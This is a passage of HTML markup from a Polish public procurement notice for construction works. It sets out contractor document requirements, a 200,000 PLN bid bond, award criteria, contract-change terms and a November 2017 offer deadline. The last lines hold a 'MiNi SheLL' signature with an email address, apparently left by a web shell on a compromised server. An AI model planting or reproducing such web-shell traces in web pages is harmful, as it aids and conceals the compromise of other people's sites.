wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów:1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;2) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;3) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;4) oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);- wzór druku oświadczenia stanowi Załącznik nr 6 do SIWZ;</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający żąda następujących dokumentów: 1)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 2)	potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.2. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej zamawiający żąda następujących dokumentów: 1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty;-	wzór druku wykazu stanowi Załącznik nr 5a do SIWZ. 2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;-	wzór druku wykazu stanowi Załącznik nr 5b do SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Kwotę wadium Zamawiający ustala w wysokości 200 000,00 PLN (słownie: dwieście tysięcy zł 00/100). Wykonawca zobowiązany jest wnieść wadium w terminie składania ofert w formie przewidzianej w SIWZ. Pozostałe wymagania dotyczące wadium określa Rozdział VIII SIWZ.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Warunki techniczno-organizacyjne </TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji </TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie osób wyznaczonych do realizacji zamówienia </TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany. 2. Przez zmiany istotne umowy, co do których Zamawiający przewidział możliwość ich zmiany, strony rozumieją:1) zmiana terminów wykonania zamówienia, o którym mowa w §6 ust. 1 i 2, jeżeli zachowanie wyznaczonych terminów jest niemożliwe z przyczyn prawno-administracyjnych, technicznych lub organizacyjnych o obiektywnym charakterze, a Zamawiający wyrazi zgodę na wydłużenie realizacji prac z zachowaniem formy pisemnej w postaci aneksu do umowy; 2) zmianę zakresu robót objętych Inwestycją oraz sposobu (technologii) wykonania tego zakresu robót jak również wykonanie robót zamiennych, nie powodującą zmiany zakresu przedmiotu zamówienia, przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji zakresu robót określonego w §2 umowy tj. zmiana dokumentacji projektowej, zaistniałe warunki faktyczne na terenie budowy, wpływające na zakres lub sposób (technologię) wykonania zakresu robót;3) regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy wraz ze skutkami wprowadzenia takiej zmiany. Prawo zmiany nie obejmuje zmiany umowy w przypadku zmiany stawki podatku od towarów i usług lub zmiany w zakresie zwolnień z podatku od towarów i usług; 4) zmiany formy zabezpieczenia należytego wykonania umowy;5) w innych przypadkach określonych w umowie.3. Strony dopuszczają również zmianę umowy, jeśli zaistnieją okoliczności, o których mowa w art. 144 ustawy - Prawo zamówień publicznych.4. Zamawiający dopuszcza zmianę terminu realizacji przedmiotu umowy w przypadku: 1) wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji zamówienia określonego w umowie w §6 ust. 1 i 2 ze względu na: a. brak możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych (o czas, w którym - na skutek tych zdarzeń - nie było możliwe wykonanie umowy i na który - w ich wyniku - jej wykonanie zostało przerwane) lubb. działanie siły wyższej w rozumieniu przepisów Kodeksu cywilnego (o czas niezbędny do wykonania zamówienia) lubc. wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę (o czas, w którym - na skutek tych zdarzeń - nie było możliwe wykonanie umowy i na który - w ich wyniku - jej wykonanie zostało przerwane).5. Zmiany, o których mowa w ust. 1-4 powyżej, muszą zostać udokumentowane. Pismo (wniosek) dotyczące ww. zmian wraz z uzasadnieniem, strona występująca z wnioskiem zobowiązana jest złożyć drugiej stronie w terminie 7 dni od daty powzięcia wiadomości o takiej okoliczności.6. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-11-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com